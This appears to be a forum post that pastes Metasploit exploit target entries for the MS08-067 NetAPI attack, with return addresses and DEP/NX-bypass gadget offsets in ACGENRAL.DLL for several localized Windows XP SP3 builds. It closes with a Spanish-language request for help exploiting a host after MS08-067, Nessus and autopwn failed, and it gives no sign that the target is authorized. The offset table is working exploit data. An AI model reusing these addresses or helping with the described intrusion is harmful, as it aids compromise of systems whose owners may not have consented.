# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Dutch (NX)', { 'Ret' => 0x596cf807, 'DisableNX' => 0x596d17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Norwegian (NX)', { 'Ret' => 0x597cf807, 'DisableNX' => 0x597d17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Polish (NX)', { 'Ret' => 0x5941f807, 'DisableNX' => 0x594217c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Portuguese - Brazilian (NX)', { 'Ret' => 0x596ff807, 'DisableNX' => 0x597017c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Portuguese (NX)', { 'Ret' => 0x596bf807, 'DisableNX' => 0x596c17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Russian (NX)', { 'Ret' => 0x6fe1f807, 'DisableNX' => 0x6fe217c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Swedish (NX)', { 'Ret' => 0x597af807, 'DisableNX' => 0x597b17c2, 'Scratch' => 0x00020408 } ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
# Metasploit's NX bypass for XP SP2/SP3 [ 'Windows XP SP3 Turkish (NX)', { 'Ret' => 0x5a78f807, 'DisableNX' => 0x5a7917c2, 'Scratch' => 0x00020408 } Una vez dicho esto, quiero pedirles ayuda, como puedo hacerlo? estoy encerrado, no se como hacerlo, y conozco muy pocas vulnerabilidades que explotar, la que mas usaba era la ms08_67_netapi pero esta vez ha fallado, y hechandole con el sacner nessus y un autopwn tampoco tira ( no esperaba mucho de este ultimo -.-'). Admito vulnerabilidades posibles en el host. Si lo consigo lo masterizare como guia de ataque modelo. Saludos y gracias a tod@s.
|
|
|
|
|
|
|